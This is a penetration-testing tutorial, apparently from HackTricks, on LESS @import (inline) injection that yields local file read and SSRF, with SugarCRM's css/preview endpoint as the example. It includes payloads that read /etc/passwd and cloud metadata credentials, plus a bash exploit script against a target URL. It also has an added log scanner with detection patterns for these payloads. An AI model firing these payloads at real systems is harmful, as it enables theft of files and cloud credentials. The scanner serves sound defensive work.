LESS Code Injection leading to SSRF & Local File Read

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine resolves the resources referenced in @import statements and embeds ("inlines") them into the resulting CSS when the (inline) option is used.

When an application concatenates user-controlled input into a string that is later parsed by the LESS compiler, an attacker can inject arbitrary LESS code. By abusing @import (inline) the attacker can force the server to fetch:

  • Local files via the file:// protocol (information disclosure / Local File Inclusion).
  • Remote resources on internal networks or cloud metadata services (SSRF).

This technique has been observed in real-world products such as SugarCRM ≤ 14.0.0 (/rest/v10/css/preview endpoint).

Exploitation

  1. Identify a parameter that is embedded directly into a stylesheet string processed by the LESS engine (example: ?lm= in SugarCRM).
  2. Close the current statement and inject new directives. The common primitives are:
  • ; – terminates the previous declaration.
  • } – closes the previous block (if needed).
  3. Use @import (inline) '<URL>'; to read an arbitrary resource.
  4. Optionally inject a marker (data: URI) after the import so that the fetched content is easier to extract from the compiled CSS.

Local File Read

1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //

The contents of /etc/passwd will appear in the HTTP response immediately before the @@END@@ marker.

SSRF – Cloud Metadata

1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //

Automated PoC (SugarCRM example)

#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd

TARGET="$1"        # Base URL of the SugarCRM instance (trailing slash expected)
RESOURCE="$2"      # file:// path or URL to fetch

# Build the LESS payload (statement terminator, inline import of the resource,
# inline import of the @@END@@ marker, trailing comment) and URL-encode it.
INJ=$(python -c "import urllib.parse;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")

# Request the compiled stylesheet and print whatever follows the marker on
# the line that contains it.
curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'
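A detection-side counterpart, added here and not part of the original page: it decodes the lm query value from constructed access-log lines and flags the injection primitives described above (an @import directive, the (inline) option, a file:// scheme, the link-local metadata address), and also shows the strict allow-list check an application could apply before interpolating a value into a LESS string. The Combined-Log-Format lines are constructed samples; the parameter name lm is the SugarCRM one named on the page.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Primitives of the technique described above, as decoded-text patterns.
INJECTION_PATTERNS = {
    "less_import": re.compile(r"@import\b", re.I),
    "inline_option": re.compile(r"\(\s*inline\s*\)", re.I),
    "file_scheme": re.compile(r"file://", re.I),
    "metadata_ip": re.compile(r"169\.254\.169\.254"),
}

# Allow-list for a value that is about to be interpolated into LESS: a plain
# token, so ';', '}', quotes, '@' and '(' can never reach the compiler.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

def is_safe_less_value(value: str) -> bool:
    return SAFE_VALUE.fullmatch(value) is not None

def classify_request(path_and_query: str, param: str = "lm"):
    """Return the sorted list of injection indicators found in the parameter."""
    query = urlsplit(path_and_query).query
    hits = set()
    for raw in parse_qs(query, keep_blank_values=True).get(param, []):
        decoded = unquote_plus(raw)  # second pass catches double-encoded payloads
        hits.update(name for name, rx in INJECTION_PATTERNS.items() if rx.search(decoded))
    return sorted(hits)

def scan_access_log(lines):
    """Yield (client_ip, request_target, indicators) for suspicious preview requests."""
    line_re = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = line_re.match(line)
        if not m:
            continue
        ip, target = m.groups()
        if "/css/preview" in target:
            hits = classify_request(target)
            if hits:
                yield ip, target, hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /rest/v10/css/preview?baseUrl=1&lm=1%3B+%40import+%28inline%29+%27file%3A%2F%2F%2Fetc%2Fpasswd%27%3B HTTP/1.1" 200 5120',
    '10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /rest/v10/css/preview?baseUrl=1&lm=1%3B+%40import+%28inline%29+%22http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F%22%3B HTTP/1.1" 200 800',
    '10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /rest/v10/css/preview?baseUrl=1&lm=default HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, target, hits in scan_access_log(SAMPLE_LOG):
        print(ip, hits)
```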

Real-World Examples

Product            | Exploited endpoint          | Impact
SugarCRM ≤ 14.0.0  | /rest/v10/css/preview?lm=   | Unauthenticated SSRF & local file read
